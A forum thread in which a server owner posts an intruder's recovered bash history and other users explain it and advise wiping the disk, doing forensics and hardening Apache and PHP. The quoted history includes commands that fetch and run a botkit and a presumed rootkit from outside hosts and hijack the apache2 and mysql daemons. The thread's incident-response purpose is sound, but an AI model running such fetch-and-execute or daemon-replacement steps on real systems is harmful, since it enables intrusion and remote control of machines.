# Hacker, Crackers and such...

## tradenet

Not sure if I'm giving people a heads up but here it goes....

net-www/apache-2.0.48-r1  

Recently I've been experiencing unusual activity in /tmp

User apache seems to be accessing this directory and interestingly left this bash history (in /tmp) plus some remnants and here for everyones pleasure is the bash history:

w

/sbin/ifconfig | grep inet

cd /var/tmp

wget bsdvault.org/pelet/pakyuh/tgz

wget bsdvault.org/pelet/pakyuh.tgz

tar -zxvf pakyuh.tgz

cd cintakuh

ps -x

./kik "/usr/sbin/apache2 -k start" httpd

exit

ps -x

cd /var/tmp/cintakuh

./kik "mysql" httpd

ps -x

ps -x

cd ..

uname -a

wget pupet.net/gadis/slack

chmod 755 slack

./slack

exit

..........

So what's with apache? and where is the back door?

----------

## adaptr

 *tradenet wrote:*   

> wget bsdvault.org/pelet/pakyuh.tgz

 

This is a botkit with both IRC and http servers.

 *tradenet wrote:*   

> ./kik "/usr/sbin/apache2 -k start" httpd

 

This replaces the valid apache daemon with the botkit version.

 *tradenet wrote:*   

> ./kik "mysql" httpd

 

Same for mysql.

This essentially gives the cracker access to all your web/mysql content, and a backdoor via IRC to issue his commands to the daemons he installed.

 *tradenet wrote:*   

> wget pupet.net/gadis/slack
> 
> chmod 755 slack
> 
> ./slack

 

This is a real rootkit - presumably a root shell with an IRC connection or such.

 *tradenet wrote:*   

> So what's with apache? and where is the back door?

 

Where it is is irrelevant - you have been cracked.

Remove the HD and re-install.

Really.

----------

## Dalrain

I applaud adaptr for his knowledge of exactly what these are, and I agree you should totally wipe your drive and start again.  If you can spare the time additionally though, some forensics might be a good idea.  (After pulling the box from the net!)

Reinstalling and then getting bit by the same problem isn't fun.   Any specific ideas on what might have let them in?

----------

## adaptr

 *Dalrain wrote:*   

> I applaud adaptr for his knowledge of exactly what these are

 

Not too heavy on the praise, please...  :Wink: 

I downloaded the files in his logs - the wget commands give real, exact URL's, so they are simply downloadable !

Then opened up the tar.gz one (safe enough) and looked at some files - hey! it's an IRC server thingy!

Reflex reaction: IRC bot.

There's also a fakey httpd, so that would be a replacement for a valid apache.

The other binary (slack) is a 435 KB ELF executable, so probably a rootkit/root shell.

Really, deduction is all I used.

The fact that these traces were left is nothing to go on - the whole point is that he is able to cover his tracks from the moment he gains root, so you will never actually see an attacker being root.

Very important lil' factoid to NOT forget!

BTW the OP might like to check the URLs (see http://samspade.org) and file an official complaint to the owner of the domain(s).

And I will warn you again: do not use this machine - get it off the net and kill the HD before more harm is done!

----------

## Derringer

Indeed, take this machine off the net and do an analysis of your logs to try and prevent the same thing from happening on a re-install.

There are a couple of things that become apparent, to start your investigation with:

The bash history you saw was simply careless work.  Unless you caught this immediately after the rootkit was installed, this person should have immediately wiped that evidence, but alas, they did not, and they have given you something to go on.

Since he was user 'apache', it follows that he broke in via the apache process.  Look for evidence of stack or buffer overflows to allow him a shell under user 'apache'.  Other possible sources are poorly installed or written cgi-scripts.

Was your installation pretty much default or did you mess around with it alot  (specifically asking about your apache install)?  Did you have server-side scripts up and running?

The actual diagnosis of exactly what was done can help  many of us here who try to stay ahead of the game.  Please keep us updated =)

----------

## tradenet

This machine is a fresh install. (About two months old) And I have been watching this box carefully. I looked at all the logs...however I am suspect of a older phpnuke installation on this box. I checked the phpnuke.org site but this version appears to have no security alerts or upgrades. Luckly I managed to catch this as it was being done. So no apparent damage. It appears also that botkit was crashing as it was being executed. 

 *Derringer wrote:*   

> Indeed, take this machine off the net and do an analysis of your logs to try and prevent the same thing from happening on a re-install.
> 
> There are a couple of things that become apparent, to start your investigation with:
> 
> The bash history you saw was simply careless work.  Unless you caught this immediately after the rootkit was installed, this person should have immediately wiped that evidence, but alas, they did not, and they have given you something to go on.
> ...

 

----------

## drspewfy

what is the version of Apache ?'

im sure that you have been hacked by apache,

thats why the user has Apache privilegies...

and is using apache user,,

you should change  int /etc/shadow,   the user of apache to -> /bin/false, and not use /bin/bash..

seya

----------

## tradenet

Yes, if you look at the top of this thread...

net-www/apache

      Latest version available: 2.0.48-r1

      Latest version installed: 2.0.48-r1

      Size of downloaded files: 6,111 kB

/etc/shadow?

maybe /etc/passwd...yes it's /bin/false

 *drspewfy wrote:*   

> what is the version of Apache ?'
> 
> im sure that you have been hacked by apache,
> 
> thats why the user has Apache privilegies...
> ...

 

----------

## tradenet

Frankly, we need more discussion on these activities. People really need to "come out" and reveal.

----------

## Hara

 *tradenet wrote:*   

> Frankly, we need more discussion on these activities. People really need to "come out" and reveal.

 

I agree.

However, after googling information on firewalls, I am unable to conclude how this would be prevented. I am aware that Linux is much more secure than Windows, however, Linux is not infalliable.  My question is this, how can this be prevented? Is not running normally as root, having a firewall, and keeping uptodate on newest versions of software the best way or is there more?

----------

## adaptr

"Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".

 :Wink: 

----------

## tradenet

Good one.   :Very Happy: 

 *adaptr wrote:*   

> "Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".
> 
> 

 

----------

## tradenet

BTW, I understand cow's in the Netherlands live in hotels  :Cool: 

 *adaptr wrote:*   

> "Not running apache 2 until it has proven to be able to withstand cows thrown at it at high speed".
> 
> 

 

----------

## Deebster

Please keep a backup of all your logs and files in htdocs (+ the whole machine if you've got the space  :Wink: )

I'm running that version of apache too, so I'd like to know how he did get in (paranoia++).

/var/log/apache2/access_log and /var/log/apache2/error_log would be particularly useful things to go over if you don't mind posting/sending them.

----------

## tradenet

Indeed. As soon as I find something relevant I will post it. Seem's tho' things are pointing towards mod-php....maybe a version of phpnuke.

 *Deebster wrote:*   

> Please keep a backup of all your logs and files in htdocs (+ the whole machine if you've got the space )
> 
> I'm running that version of apache too, so I'd like to know how he did get in (paranoia++).
> 
> /var/log/apache2/access_log and /var/log/apache2/error_log would be particularly useful things to go over if you don't mind posting/sending them.

 

----------

## adaptr

 *tradenet wrote:*   

> BTW, I understand cow's in the Netherlands live in hotels  

 

No, you're thinking of American tourists.

----------

## tradenet

 :Laughing:   :Laughing: 

 *adaptr wrote:*   

>  *tradenet wrote:*   BTW, I understand cow's in the Netherlands live in hotels   
> 
> No, you're thinking of American tourists.

   :Laughing: 

----------

